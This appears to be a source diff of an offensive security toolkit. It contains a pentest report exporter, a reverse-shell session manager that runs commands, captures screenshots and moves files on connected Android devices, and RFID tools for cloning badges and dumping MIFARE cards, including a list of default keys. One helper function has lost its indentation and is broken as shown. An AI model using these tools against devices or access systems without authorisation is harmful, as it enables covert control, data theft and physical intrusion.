    """Return the built-in finding templates (module-level FINDING_TEMPLATES)."""
    return FINDING_TEMPLATES
# ── Export ────────────────────────────────────────────────────────────
def export_html(self, report_id: str) -> Optional[str]:
    """Export report as styled HTML.

    Returns a complete self-contained HTML document string, or None if
    the report does not exist. Findings are ordered by severity rank
    (critical first) and all free-text fields are HTML-escaped via _esc.
    """
    report = self.get_report(report_id)
    if not report:
        return None
    findings_html = ''
    # Sort findings by severity rank; unknown severities sink to the bottom.
    sorted_findings = sorted(report.get('findings', []),
                             key=lambda f: SEVERITY_MAP.get(f.get('severity', 'info'), {}).get('order', 5))
    for i, f in enumerate(sorted_findings, 1):
        sev = f.get('severity', 'info')
        color = SEVERITY_MAP.get(sev, {}).get('color', '#666')
        # chr(10) is '\n' — avoids a backslash inside the f-string expression.
        findings_html += f'''
<div class="finding">
<h3>{i}. {_esc(f.get('title', 'Untitled'))}</h3>
<div class="finding-meta">
<span class="severity" style="background:{color}">{sev.upper()}</span>
<span>CVSS: {f.get('cvss', 'N/A')}</span>
<span>Status: {f.get('status', 'open')}</span>
</div>
<h4>Description</h4><p>{_esc(f.get('description', ''))}</p>
<h4>Impact</h4><p>{_esc(f.get('impact', ''))}</p>
<h4>Remediation</h4><p>{_esc(f.get('remediation', ''))}</p>
{'<h4>Evidence</h4><pre>' + _esc(chr(10).join(f.get('evidence', []))) + '</pre>' if f.get('evidence') else ''}
{'<h4>References</h4><ul>' + ''.join('<li>' + _esc(r) + '</li>' for r in f.get('references', [])) + '</ul>' if f.get('references') else ''}
</div>'''
    # Summary stats
    severity_counts = {}
    for f in report.get('findings', []):
        s = f.get('severity', 'info')
        severity_counts[s] = severity_counts.get(s, 0) + 1
    # One colored count box per severity level, in fixed rank order.
    summary_html = '<div class="severity-summary">'
    for sev in ['critical', 'high', 'medium', 'low', 'info']:
        count = severity_counts.get(sev, 0)
        color = SEVERITY_MAP.get(sev, {}).get('color', '#666')
        summary_html += f'<div class="sev-box" style="border-color:{color}"><span class="sev-count" style="color:{color}">{count}</span><span class="sev-label">{sev.upper()}</span></div>'
    summary_html += '</div>'
    # Assemble the final document (doubled braces escape literal CSS braces).
    html = f'''<!DOCTYPE html>
<html><head><meta charset="utf-8"><title>{_esc(report.get('title', 'Report'))}</title>
<style>
body{{font-family:-apple-system,BlinkMacSystemFont,'Segoe UI',sans-serif;max-width:900px;margin:0 auto;padding:40px;color:#1a1a2e;line-height:1.6}}
h1{{color:#0f1117;border-bottom:3px solid #6366f1;padding-bottom:10px}}
h2{{color:#333;margin-top:2rem}}
.meta{{color:#666;font-size:0.9rem;margin:1rem 0}}
.finding{{border:1px solid #ddd;border-radius:8px;padding:1.5rem;margin:1rem 0;page-break-inside:avoid}}
.finding h3{{margin-top:0;color:#1a1a2e}}
.finding h4{{color:#555;margin:1rem 0 0.3rem;font-size:0.95rem}}
.finding-meta{{display:flex;gap:1rem;margin:0.5rem 0}}
.severity{{color:#fff;padding:2px 10px;border-radius:4px;font-size:0.8rem;font-weight:700}}
pre{{background:#f5f5f5;padding:1rem;border-radius:4px;overflow-x:auto;font-size:0.85rem}}
.severity-summary{{display:flex;gap:1rem;margin:1.5rem 0}}
.sev-box{{border:2px solid;border-radius:8px;padding:0.75rem 1.5rem;text-align:center}}
.sev-count{{font-size:1.5rem;font-weight:700;display:block}}
.sev-label{{font-size:0.7rem;text-transform:uppercase;letter-spacing:0.05em}}
.footer{{margin-top:3rem;padding-top:1rem;border-top:1px solid #ddd;font-size:0.8rem;color:#999}}
</style></head><body>
<h1>{_esc(report.get('title', 'Penetration Test Report'))}</h1>
<div class="meta">
<div><strong>Client:</strong> {_esc(report.get('client', 'N/A'))}</div>
<div><strong>Date:</strong> {report.get('created_at', '')[:10]}</div>
<div><strong>Author:</strong> {_esc(report.get('author', 'AUTARCH'))}</div>
<div><strong>Status:</strong> {report.get('status', 'draft').upper()}</div>
</div>
<h2>Executive Summary</h2>
<p>{_esc(report.get('executive_summary', 'No executive summary provided.'))}</p>
<h2>Scope</h2>
<p>{_esc(report.get('scope', 'No scope defined.'))}</p>
<h2>Methodology</h2>
<p>{_esc(report.get('methodology', ''))}</p>
<h2>Findings Overview</h2>
{summary_html}
<h2>Detailed Findings</h2>
{findings_html if findings_html else '<p>No findings recorded.</p>'}
<div class="footer">
Generated by AUTARCH Security Platform — {datetime.now(timezone.utc).strftime('%Y-%m-%d %H:%M UTC')}
</div>
</body></html>'''
    return html
def export_markdown(self, report_id: str) -> Optional[str]:
    """Export report as Markdown.

    Returns a Markdown document string, or None if the report is missing.
    Findings are rendered in severity-rank order (critical first).
    Note: field values are interpolated verbatim (no Markdown escaping).
    """
    report = self.get_report(report_id)
    if not report:
        return None
    # Trailing double spaces force Markdown hard line breaks in the header.
    md = f"# {report.get('title', 'Report')}\n\n"
    md += f"**Client:** {report.get('client', 'N/A')}  \n"
    md += f"**Date:** {report.get('created_at', '')[:10]}  \n"
    md += f"**Author:** {report.get('author', 'AUTARCH')}  \n"
    md += f"**Status:** {report.get('status', 'draft')}  \n\n"
    md += "## Executive Summary\n\n"
    md += report.get('executive_summary', 'N/A') + "\n\n"
    md += "## Scope\n\n"
    md += report.get('scope', 'N/A') + "\n\n"
    md += "## Findings\n\n"
    # Same severity ordering as the HTML export.
    sorted_findings = sorted(report.get('findings', []),
                             key=lambda f: SEVERITY_MAP.get(f.get('severity', 'info'), {}).get('order', 5))
    for i, f in enumerate(sorted_findings, 1):
        md += f"### {i}. [{f.get('severity', 'info').upper()}] {f.get('title', 'Untitled')}\n\n"
        md += f"**CVSS:** {f.get('cvss', 'N/A')} | **Status:** {f.get('status', 'open')}\n\n"
        md += f"**Description:** {f.get('description', '')}\n\n"
        md += f"**Impact:** {f.get('impact', '')}\n\n"
        md += f"**Remediation:** {f.get('remediation', '')}\n\n"
        if f.get('evidence'):
            md += "**Evidence:**\n```\n" + '\n'.join(f['evidence']) + "\n```\n\n"
        if f.get('references'):
            md += "**References:** " + ', '.join(f['references']) + "\n\n"
        md += "---\n\n"
    md += f"\n*Generated by AUTARCH — {datetime.now(timezone.utc).strftime('%Y-%m-%d')}*\n"
    return md
def export_json(self, report_id: str) -> Optional[str]:
    """Serialize the full report as pretty-printed JSON; None if missing."""
    report = self.get_report(report_id)
    return json.dumps(report, indent=2) if report else None
# ── Internal ──────────────────────────────────────────────────────────
def _save_report(self, report: dict):
    """Persist a report dict to <data_dir>/<id>.json, pretty-printed."""
    out_path = Path(self._data_dir) / f'{report["id"]}.json'
    with out_path.open('w') as fh:
        json.dump(report, fh, indent=2)
def _esc(s: str) -> str:
return (s or '').replace('&', '&amp;').replace('<', '&lt;').replace('>', '&gt;')
# ── Singleton ─────────────────────────────────────────────────────────────────
_instance = None
_lock = threading.Lock()
def get_report_engine() -> ReportEngine:
    """Return the process-wide ReportEngine singleton, creating it lazily.

    Always takes the module lock; construction happens at most once.
    """
    global _instance
    with _lock:
        if _instance is None:
            _instance = ReportEngine()
    return _instance
# ── CLI ───────────────────────────────────────────────────────────────────────
def run():
    """Interactive CLI for Reporting Engine.

    Text-menu loop over the ReportEngine singleton: list/create reports,
    add findings (from template or ad hoc), and export in html/markdown/json.
    Loops until the user selects 0.
    """
    svc = get_report_engine()
    while True:
        print("\n╔═══════════════════════════════════════╗")
        print("║ REPORTING ENGINE ║")
        print("╠═══════════════════════════════════════╣")
        print("║ 1 — List Reports ║")
        print("║ 2 — Create Report ║")
        print("║ 3 — Add Finding ║")
        print("║ 4 — Export Report ║")
        print("║ 5 — Finding Templates ║")
        print("║ 0 — Back ║")
        print("╚═══════════════════════════════════════╝")
        choice = input("\n Select: ").strip()
        if choice == '0':
            break
        elif choice == '1':
            reports = svc.list_reports()
            if not reports:
                print("\n No reports.")
                continue
            for r in reports:
                print(f" [{r['id']}] {r['title']} — {r['findings_count']} findings "
                      f"({r['status']}) {r['updated_at'][:10]}")
        elif choice == '2':
            title = input(" Report title: ").strip()
            client = input(" Client name: ").strip()
            scope = input(" Scope: ").strip()
            r = svc.create_report(title, client, scope)
            print(f" Created report: {r['report']['id']}")
        elif choice == '3':
            rid = input(" Report ID: ").strip()
            print(" Available templates:")
            for i, t in enumerate(FINDING_TEMPLATES, 1):
                print(f" {i}. [{t['severity'].upper()}] {t['title']}")
            sel = input(" Template # (0 for custom): ").strip()
            if sel and sel != '0':
                # NOTE(review): int(sel) raises ValueError on non-numeric
                # input and aborts the menu loop — confirm intended.
                idx = int(sel) - 1
                if 0 <= idx < len(FINDING_TEMPLATES):
                    # Copy so the shared template is never mutated.
                    f = FINDING_TEMPLATES[idx].copy()
                    f.pop('id', None)
                    r = svc.add_finding(rid, f)
                    if r['ok']:
                        print(f" Added: {f['title']}")
            else:
                title = input(" Title: ").strip()
                severity = input(" Severity (critical/high/medium/low/info): ").strip()
                desc = input(" Description: ").strip()
                r = svc.add_finding(rid, {'title': title, 'severity': severity,
                                          'description': desc})
                if r['ok']:
                    print(f" Added finding: {r['finding']['id']}")
        elif choice == '4':
            rid = input(" Report ID: ").strip()
            fmt = input(" Format (html/markdown/json): ").strip() or 'html'
            if fmt == 'html':
                content = svc.export_html(rid)
            elif fmt == 'markdown':
                content = svc.export_markdown(rid)
            else:
                content = svc.export_json(rid)
            if content:
                ext = {'html': 'html', 'markdown': 'md', 'json': 'json'}.get(fmt, 'txt')
                # Export lands next to the report JSON in the engine data dir.
                outpath = os.path.join(svc._data_dir, f'{rid}.{ext}')
                with open(outpath, 'w') as f:
                    f.write(content)
                print(f" Exported to: {outpath}")
            else:
                print(" Report not found.")
        elif choice == '5':
            for t in FINDING_TEMPLATES:
                print(f" [{t['severity'].upper():8s}] {t['title']} (CVSS {t['cvss']})")

1979
modules/reverse_eng.py Normal file

File diff suppressed because it is too large Load Diff

365
modules/revshell.py Normal file
View File

@@ -0,0 +1,365 @@
"""
Reverse Shell Manager - Manage incoming reverse shell connections from Archon companion app.
Control the RevShell listener, manage sessions, execute commands, transfer files.
"""
DESCRIPTION = "Reverse Shell — remote device management via Archon"
AUTHOR = "AUTARCH"
VERSION = "1.0"
CATEGORY = "offense"
import sys
from pathlib import Path
sys.path.insert(0, str(Path(__file__).parent.parent))
class RevShellManager:
    """Interactive reverse shell management menu.

    Thin console front-end over core.revshell: controls the listener
    lifecycle, enumerates sessions, and dispatches commands / file
    transfers to connected Archon companion devices.
    """
    def __init__(self):
        # Import lazily so this module can load even before core.revshell
        # is ready; store the accessor, not the listener itself.
        from core.revshell import get_listener
        self._get_listener = get_listener
    @property
    def listener(self):
        # Re-resolve on every access — the singleton may be restarted.
        return self._get_listener()
    def show_menu(self):
        """Print the main menu with live listener status and session counts."""
        li = self.listener
        sessions = li.list_sessions()
        alive = [s for s in sessions if s.get('alive', False)]
        print(f"\n{'='*55}")
        print(" Reverse Shell Manager")
        print(f"{'='*55}")
        print(f" Listener: {'RUNNING on ' + str(li.host) + ':' + str(li.port) if li.running else 'Stopped'}")
        print(f" Sessions: {len(alive)} active, {len(sessions)} total")
        if li.running:
            print(f" Token: {li.auth_token}")
        print()
        print(" -- Listener --")
        print(" 1) Start Listener")
        print(" 2) Stop Listener")
        print(" 3) Listener Status")
        print()
        print(" -- Sessions --")
        print(" 10) List Sessions")
        print(" 11) Select Session (interactive shell)")
        print(" 12) Execute Command")
        print(" 13) Disconnect Session")
        print()
        print(" -- Device Info --")
        print(" 20) System Info")
        print(" 21) Installed Packages")
        print(" 22) Running Processes")
        print(" 23) Network Connections")
        print(" 24) Logcat Output")
        print()
        print(" -- Capture --")
        print(" 30) Take Screenshot")
        print(" 31) Download File")
        print(" 32) Upload File")
        print()
        print(" 0) Back")
        print()
    # ── Helpers ─────────────────────────────────────────────────────
    def _pick_session(self, prompt=" Select session #: "):
        """Let user pick a session from the list.

        Only alive sessions are offered. Returns the chosen session_id,
        or None on empty list / invalid input / Ctrl+C.
        """
        sessions = self.listener.list_sessions()
        alive = [s for s in sessions if s.get('alive', False)]
        if not alive:
            print(" No active sessions.")
            return None
        print("\n Active Sessions:")
        for i, s in enumerate(alive, 1):
            uptime_m = s.get('uptime', 0) // 60
            print(f" {i}) [{s['session_id'][:8]}] {s['device']} "
                  f"(Android {s['android']}, UID {s['uid']}) — {uptime_m}m")
        try:
            choice = int(input(prompt).strip())
            if 1 <= choice <= len(alive):
                return alive[choice - 1]['session_id']
        except (ValueError, EOFError, KeyboardInterrupt):
            pass
        return None
    def _get_session_obj(self, sid):
        """Get the actual session object, or None (with message) if gone."""
        session = self.listener.get_session(sid)
        if not session or not session.alive:
            print(f" Session {sid} not found or dead.")
            return None
        return session
    # ── Listener ────────────────────────────────────────────────────
    def do_start(self):
        """Prompt for bind address/port/token and start the listener."""
        if self.listener.running:
            print(" Listener already running.")
            return
        try:
            host = input(f" Bind address [0.0.0.0]: ").strip() or '0.0.0.0'
            port_s = input(f" Port [17322]: ").strip() or '17322'
            token = input(f" Auth token (blank=random): ").strip() or None
        except (EOFError, KeyboardInterrupt):
            return
        from core.revshell import start_listener
        ok, msg = start_listener(host=host, port=int(port_s), token=token)
        if ok:
            print(f" {msg}")
            print(f" Token: {self.listener.auth_token}")
        else:
            print(f" Error: {msg}")
    def do_stop(self):
        """Stop the listener if it is running."""
        if not self.listener.running:
            print(" Listener not running.")
            return
        from core.revshell import stop_listener
        stop_listener()
        print(" Listener stopped.")
    def do_status(self):
        """Print listener bind info, token, and session counts."""
        li = self.listener
        print(f"\n Listener Status:")
        print(f" Running: {li.running}")
        print(f" Host: {li.host}")
        print(f" Port: {li.port}")
        print(f" Token: {li.auth_token}")
        sessions = li.list_sessions()
        alive = [s for s in sessions if s.get('alive', False)]
        print(f" Sessions: {len(alive)} active, {len(sessions)} total")
    # ── Sessions ────────────────────────────────────────────────────
    def do_list_sessions(self):
        """Print a table of all sessions (alive and dead)."""
        sessions = self.listener.list_sessions()
        if not sessions:
            print("\n No sessions.")
            return
        print(f"\n {'ID':<14} {'Device':<20} {'Android':<10} {'UID':<6} {'Uptime':<10} {'Cmds':<6} {'Status'}")
        print(f" {'-'*80}")
        for s in sessions:
            uptime_m = s.get('uptime', 0) // 60
            status = 'ALIVE' if s.get('alive') else 'DEAD'
            print(f" {s['session_id']:<14} {s['device']:<20} {s['android']:<10} "
                  f"{s['uid']:<6} {uptime_m}m{'':<7} {s.get('commands_executed', 0):<6} {status}")
    def do_interactive_shell(self):
        """REPL-style loop: run each entered command on the picked session."""
        sid = self._pick_session()
        if not sid:
            return
        session = self._get_session_obj(sid)
        if not session:
            return
        print(f"\n Interactive shell — {session.device_name} (Android {session.android_version})")
        print(f" Type 'exit' or Ctrl+C to leave.\n")
        while session.alive:
            try:
                cmd = input(f" {session.device_name}$ ").strip()
            except (EOFError, KeyboardInterrupt):
                print()
                break
            if not cmd:
                continue
            if cmd.lower() in ('exit', 'quit'):
                break
            result = session.execute(cmd, timeout=30)
            if result['stdout']:
                for line in result['stdout'].rstrip('\n').split('\n'):
                    print(f" {line}")
            if result['stderr']:
                for line in result['stderr'].rstrip('\n').split('\n'):
                    print(f" [stderr] {line}")
            if result['exit_code'] != 0:
                print(f" [exit code: {result['exit_code']}]")
    def do_execute_command(self):
        """Run a single command on a picked session and show stdout/stderr."""
        sid = self._pick_session()
        if not sid:
            return
        session = self._get_session_obj(sid)
        if not session:
            return
        try:
            cmd = input(" Command: ").strip()
            timeout_s = input(" Timeout [30]: ").strip() or '30'
        except (EOFError, KeyboardInterrupt):
            return
        if not cmd:
            return
        print(f" Executing on {session.device_name}...")
        result = session.execute(cmd, timeout=int(timeout_s))
        if result['stdout']:
            print(f"\n --- stdout ---")
            for line in result['stdout'].rstrip('\n').split('\n'):
                print(f" {line}")
        if result['stderr']:
            print(f"\n --- stderr ---")
            for line in result['stderr'].rstrip('\n').split('\n'):
                print(f" {line}")
        print(f"\n Exit code: {result['exit_code']}")
    def do_disconnect_session(self):
        """Drop a picked session from the listener."""
        sid = self._pick_session(" Session to disconnect #: ")
        if not sid:
            return
        self.listener.remove_session(sid)
        print(f" Session {sid} disconnected.")
    # ── Device Info ─────────────────────────────────────────────────
    def _run_special(self, label, method_name, **kwargs):
        """Pick a session, call its named method, and print the result.

        Generic driver for the device-info commands below; *label* is only
        used for the progress message.
        """
        sid = self._pick_session()
        if not sid:
            return
        session = self._get_session_obj(sid)
        if not session:
            return
        print(f" Fetching {label} from {session.device_name}...")
        method = getattr(session, method_name)
        result = method(**kwargs)
        if result.get('exit_code', -1) == 0:
            output = result.get('stdout', '')
            if output:
                for line in output.rstrip('\n').split('\n'):
                    print(f" {line}")
            else:
                print(f" (no output)")
        else:
            print(f" Error: {result.get('stderr', 'Failed')}")
    def do_sysinfo(self):
        """Show device system information."""
        self._run_special("system info", "sysinfo")
    def do_packages(self):
        """List installed packages on the device."""
        self._run_special("packages", "packages")
    def do_processes(self):
        """List running processes on the device."""
        self._run_special("processes", "processes")
    def do_netstat(self):
        """Show the device's network connections."""
        self._run_special("network connections", "netstat")
    def do_logcat(self):
        """Fetch the last N logcat lines from a picked session."""
        try:
            lines = input(" Lines [100]: ").strip() or '100'
        except (EOFError, KeyboardInterrupt):
            return
        sid = self._pick_session()
        if not sid:
            return
        session = self._get_session_obj(sid)
        if not session:
            return
        print(f" Fetching logcat ({lines} lines) from {session.device_name}...")
        # NOTE(review): int(lines) raises ValueError on non-numeric input.
        result = session.dumplog(lines=int(lines))
        if result.get('exit_code', -1) == 0:
            output = result.get('stdout', '')
            if output:
                for line in output.rstrip('\n').split('\n'):
                    print(f" {line}")
        else:
            print(f" Error: {result.get('stderr', 'Failed')}")
    # ── Capture ─────────────────────────────────────────────────────
    def do_screenshot(self):
        """Capture and save a screenshot from a picked session."""
        sid = self._pick_session()
        if not sid:
            return
        print(f" Taking screenshot...")
        filepath = self.listener.save_screenshot(sid)
        if filepath:
            print(f" Saved: {filepath}")
        else:
            print(f" Screenshot failed.")
    def do_download(self):
        """Download a remote file from a picked session to local disk."""
        sid = self._pick_session()
        if not sid:
            return
        try:
            remote_path = input(" Remote file path: ").strip()
        except (EOFError, KeyboardInterrupt):
            return
        if not remote_path:
            return
        print(f" Downloading {remote_path}...")
        filepath = self.listener.save_download(sid, remote_path)
        if filepath:
            print(f" Saved: {filepath}")
        else:
            print(f" Download failed.")
    def do_upload(self):
        """Upload a local file to a destination path on the device."""
        sid = self._pick_session()
        if not sid:
            return
        try:
            local_path = input(" Local file path: ").strip()
            remote_path = input(" Remote destination: ").strip()
        except (EOFError, KeyboardInterrupt):
            return
        if not local_path or not remote_path:
            return
        if not Path(local_path).exists():
            print(f" Local file not found: {local_path}")
            return
        session = self._get_session_obj(sid)
        if not session:
            return
        print(f" Uploading to {remote_path}...")
        result = session.upload(local_path, remote_path)
        if result.get('exit_code', -1) == 0:
            print(f" Upload complete.")
        else:
            print(f" Error: {result.get('stderr', 'Failed')}")
    # ── Main Loop ──────────────────────────────────────────────────
    def run_interactive(self):
        """Menu loop: dispatch numeric choices to do_* handlers until 0."""
        while True:
            self.show_menu()
            try:
                choice = input(" Select > ").strip()
            except (EOFError, KeyboardInterrupt):
                break
            if choice == '0':
                break
            # Dispatch table keyed by the menu number shown in show_menu().
            actions = {
                '1': self.do_start,
                '2': self.do_stop,
                '3': self.do_status,
                '10': self.do_list_sessions,
                '11': self.do_interactive_shell,
                '12': self.do_execute_command,
                '13': self.do_disconnect_session,
                '20': self.do_sysinfo,
                '21': self.do_packages,
                '22': self.do_processes,
                '23': self.do_netstat,
                '24': self.do_logcat,
                '30': self.do_screenshot,
                '31': self.do_download,
                '32': self.do_upload,
            }
            action = actions.get(choice)
            if action:
                action()
            else:
                print(" Invalid choice.")
def run():
    """Module entry point: launch the interactive reverse-shell menu."""
    RevShellManager().run_interactive()

455
modules/rfid_tools.py Normal file
View File

@@ -0,0 +1,455 @@
"""AUTARCH RFID/NFC Tools
Proxmark3 integration, badge cloning, NFC read/write, MIFARE operations,
and card analysis for physical access security testing.
"""
DESCRIPTION = "RFID/NFC badge cloning & analysis"
AUTHOR = "darkHal"
VERSION = "1.0"
CATEGORY = "analyze"
import os
import re
import json
import time
import shutil
import subprocess
from pathlib import Path
from datetime import datetime, timezone
from typing import Dict, List, Optional, Any
# Prefer the AUTARCH helpers; fall back to PATH-only lookups and a local
# data directory when this module is used outside the AUTARCH tree.
try:
    from core.paths import find_tool, get_data_dir
except ImportError:
    def find_tool(name):
        # PATH-only resolution (no AUTARCH-bundled tool directories).
        return shutil.which(name)
    def get_data_dir():
        # Default to <repo>/data relative to this file.
        return str(Path(__file__).parent.parent / 'data')
# ── Card Types ───────────────────────────────────────────────────────────────
# Card technologies understood by this module: LF (125 kHz) badge formats
# and HF (13.56 MHz) smartcard/NFC families. Optional flags: 'writable'
# marks clone targets, 'nfc' marks NDEF-capable tags.
CARD_TYPES = {
    'em410x': {'name': 'EM410x', 'frequency': '125 kHz', 'category': 'LF'},
    'hid_prox': {'name': 'HID ProxCard', 'frequency': '125 kHz', 'category': 'LF'},
    't5577': {'name': 'T5577', 'frequency': '125 kHz', 'category': 'LF', 'writable': True},
    'mifare_classic_1k': {'name': 'MIFARE Classic 1K', 'frequency': '13.56 MHz', 'category': 'HF'},
    'mifare_classic_4k': {'name': 'MIFARE Classic 4K', 'frequency': '13.56 MHz', 'category': 'HF'},
    'mifare_ultralight': {'name': 'MIFARE Ultralight', 'frequency': '13.56 MHz', 'category': 'HF'},
    'mifare_desfire': {'name': 'MIFARE DESFire', 'frequency': '13.56 MHz', 'category': 'HF'},
    'ntag213': {'name': 'NTAG213', 'frequency': '13.56 MHz', 'category': 'HF', 'nfc': True},
    'ntag215': {'name': 'NTAG215', 'frequency': '13.56 MHz', 'category': 'HF', 'nfc': True},
    'ntag216': {'name': 'NTAG216', 'frequency': '13.56 MHz', 'category': 'HF', 'nfc': True},
    'iclass': {'name': 'iCLASS', 'frequency': '13.56 MHz', 'category': 'HF'},
    'iso14443a': {'name': 'ISO 14443A', 'frequency': '13.56 MHz', 'category': 'HF'},
    'iso15693': {'name': 'ISO 15693', 'frequency': '13.56 MHz', 'category': 'HF'},
    'legic': {'name': 'LEGIC', 'frequency': '13.56 MHz', 'category': 'HF'},
}
# Commonly-deployed factory/transport keys (6-byte hex) offered as the
# default dictionary when attacking MIFARE Classic sectors.
MIFARE_DEFAULT_KEYS = [
    'FFFFFFFFFFFF', 'A0A1A2A3A4A5', 'D3F7D3F7D3F7',
    '000000000000', 'B0B1B2B3B4B5', '4D3A99C351DD',
    '1A982C7E459A', 'AABBCCDDEEFF', '714C5C886E97',
    '587EE5F9350F', 'A0478CC39091', '533CB6C723F6',
]
# ── RFID Manager ─────────────────────────────────────────────────────────────
class RFIDManager:
    """RFID/NFC tool management via Proxmark3 and nfc-tools.

    Wraps the external `pm3`/`proxmark3` client and libnfc utilities with
    regex-parsed results, and keeps a small JSON card database plus a dump
    directory under the AUTARCH data dir.
    """
    def __init__(self):
        self.data_dir = os.path.join(get_data_dir(), 'rfid')
        os.makedirs(self.data_dir, exist_ok=True)
        self.dumps_dir = os.path.join(self.data_dir, 'dumps')
        os.makedirs(self.dumps_dir, exist_ok=True)
        # Tool discovery
        self.pm3_client = find_tool('pm3') or find_tool('proxmark3') or shutil.which('pm3') or shutil.which('proxmark3')
        self.nfc_list = shutil.which('nfc-list')
        self.nfc_poll = shutil.which('nfc-poll')
        self.nfc_mfclassic = shutil.which('nfc-mfclassic')
        # In-memory card database; populated by _load_cards().
        self.cards: List[Dict] = []
        # Most recent successfully parsed card, if any.
        self.last_read: Optional[Dict] = None
    def get_tools_status(self) -> Dict:
        """Check available tools."""
        return {
            'proxmark3': self.pm3_client is not None,
            'nfc-list': self.nfc_list is not None,
            'nfc-mfclassic': self.nfc_mfclassic is not None,
            'card_types': len(CARD_TYPES),
            'saved_cards': len(self.cards)
        }
    # ── Proxmark3 Commands ───────────────────────────────────────────────
    def _pm3_cmd(self, command: str, timeout: int = 15) -> Dict:
        """Execute Proxmark3 command.

        Runs `pm3 -c <command>` and returns {'ok', 'stdout', 'stderr'} or
        {'ok': False, 'error': ...} on missing client / timeout / failure.
        """
        if not self.pm3_client:
            return {'ok': False, 'error': 'Proxmark3 client not found'}
        try:
            result = subprocess.run(
                [self.pm3_client, '-c', command],
                capture_output=True, text=True, timeout=timeout
            )
            return {
                'ok': result.returncode == 0,
                'stdout': result.stdout,
                'stderr': result.stderr
            }
        except subprocess.TimeoutExpired:
            return {'ok': False, 'error': f'Command timed out: {command}'}
        except Exception as e:
            return {'ok': False, 'error': str(e)}
    # ── Low Frequency (125 kHz) ──────────────────────────────────────────
    def lf_search(self) -> Dict:
        """Search for LF (125 kHz) cards.

        Parses `lf search` output for EM410x and HID ProxCard IDs; the last
        matching type wins if both patterns appear.
        """
        result = self._pm3_cmd('lf search')
        if not result['ok']:
            return result
        output = result['stdout']
        card = {'frequency': '125 kHz', 'category': 'LF'}
        # Parse EM410x
        em_match = re.search(r'EM\s*410x.*?ID[:\s]*([A-Fa-f0-9]+)', output, re.I)
        if em_match:
            card['type'] = 'em410x'
            card['id'] = em_match.group(1)
            card['name'] = 'EM410x'
        # Parse HID
        hid_match = re.search(r'HID.*?Card.*?([A-Fa-f0-9]+)', output, re.I)
        if hid_match:
            card['type'] = 'hid_prox'
            card['id'] = hid_match.group(1)
            card['name'] = 'HID ProxCard'
        if 'id' in card:
            card['raw_output'] = output
            self.last_read = card
            return {'ok': True, 'card': card}
        return {'ok': False, 'error': 'No LF card found', 'raw': output}
    def lf_read_em410x(self) -> Dict:
        """Read EM410x card."""
        result = self._pm3_cmd('lf em 410x reader')
        if not result['ok']:
            return result
        match = re.search(r'EM\s*410x\s+ID[:\s]*([A-Fa-f0-9]+)', result['stdout'], re.I)
        if match:
            card = {
                'type': 'em410x', 'id': match.group(1),
                'name': 'EM410x', 'frequency': '125 kHz'
            }
            self.last_read = card
            return {'ok': True, 'card': card}
        return {'ok': False, 'error': 'Could not read EM410x', 'raw': result['stdout']}
    def lf_clone_em410x(self, card_id: str) -> Dict:
        """Clone EM410x ID to T5577 card."""
        result = self._pm3_cmd(f'lf em 410x clone --id {card_id}')
        # Success if pm3 reported "written" or exited cleanly.
        return {
            'ok': 'written' in result.get('stdout', '').lower() or result['ok'],
            'message': f'Cloned EM410x ID {card_id}' if result['ok'] else result.get('error', ''),
            'raw': result.get('stdout', '')
        }
    def lf_sim_em410x(self, card_id: str) -> Dict:
        """Simulate EM410x card."""
        # Simulation runs until interrupted, so use a longer timeout.
        result = self._pm3_cmd(f'lf em 410x sim --id {card_id}', timeout=30)
        return {
            'ok': result['ok'],
            'message': f'Simulating EM410x ID {card_id}',
            'raw': result.get('stdout', '')
        }
    # ── High Frequency (13.56 MHz) ───────────────────────────────────────
    def hf_search(self) -> Dict:
        """Search for HF (13.56 MHz) cards.

        Parses UID/ATQA/SAK from `hf search` output, then classifies the
        card type by substring matching on the tool output.
        """
        result = self._pm3_cmd('hf search')
        if not result['ok']:
            return result
        output = result['stdout']
        card = {'frequency': '13.56 MHz', 'category': 'HF'}
        # Parse UID
        uid_match = re.search(r'UID[:\s]*([A-Fa-f0-9\s]+)', output, re.I)
        if uid_match:
            card['uid'] = uid_match.group(1).replace(' ', '').strip()
        # Parse ATQA/SAK
        atqa_match = re.search(r'ATQA[:\s]*([A-Fa-f0-9\s]+)', output, re.I)
        if atqa_match:
            card['atqa'] = atqa_match.group(1).strip()
        sak_match = re.search(r'SAK[:\s]*([A-Fa-f0-9]+)', output, re.I)
        if sak_match:
            card['sak'] = sak_match.group(1).strip()
        # Detect type
        if 'mifare classic 1k' in output.lower():
            card['type'] = 'mifare_classic_1k'
            card['name'] = 'MIFARE Classic 1K'
        elif 'mifare classic 4k' in output.lower():
            card['type'] = 'mifare_classic_4k'
            card['name'] = 'MIFARE Classic 4K'
        elif 'ultralight' in output.lower() or 'ntag' in output.lower():
            card['type'] = 'mifare_ultralight'
            card['name'] = 'MIFARE Ultralight/NTAG'
        elif 'desfire' in output.lower():
            card['type'] = 'mifare_desfire'
            card['name'] = 'MIFARE DESFire'
        elif 'iso14443' in output.lower():
            card['type'] = 'iso14443a'
            card['name'] = 'ISO 14443A'
        if 'uid' in card:
            card['raw_output'] = output
            self.last_read = card
            return {'ok': True, 'card': card}
        return {'ok': False, 'error': 'No HF card found', 'raw': output}
    def hf_dump_mifare(self, keys_file: str = None) -> Dict:
        """Dump MIFARE Classic card data.

        Uses `hf mf autopwn` (optionally with a key dictionary file).
        Returns the copied dump path if a .bin is reported, otherwise any
        keys recovered from the output.
        """
        cmd = 'hf mf autopwn'
        if keys_file:
            cmd += f' -f {keys_file}'
        # autopwn can take a while (nested/darkside attacks).
        result = self._pm3_cmd(cmd, timeout=120)
        if not result['ok']:
            return result
        output = result['stdout']
        # Look for dump file
        dump_match = re.search(r'saved.*?(\S+\.bin)', output, re.I)
        if dump_match:
            dump_file = dump_match.group(1)
            # Copy to our dumps directory
            dest = os.path.join(self.dumps_dir, Path(dump_file).name)
            if os.path.exists(dump_file):
                shutil.copy2(dump_file, dest)
            return {
                'ok': True,
                'dump_file': dest,
                'message': 'MIFARE dump complete',
                'raw': output
            }
        # Check for found keys
        keys = re.findall(r'key\s*[AB][:\s]*([A-Fa-f0-9]{12})', output, re.I)
        if keys:
            return {
                'ok': True,
                'keys_found': list(set(keys)),
                'message': f'Found {len(set(keys))} keys',
                'raw': output
            }
        return {'ok': False, 'error': 'Dump failed', 'raw': output}
    def hf_clone_mifare(self, dump_file: str) -> Dict:
        """Write MIFARE dump to blank card."""
        result = self._pm3_cmd(f'hf mf restore -f {dump_file}', timeout=60)
        return {
            'ok': 'restored' in result.get('stdout', '').lower() or result['ok'],
            'message': 'Card cloned' if result['ok'] else 'Clone failed',
            'raw': result.get('stdout', '')
        }
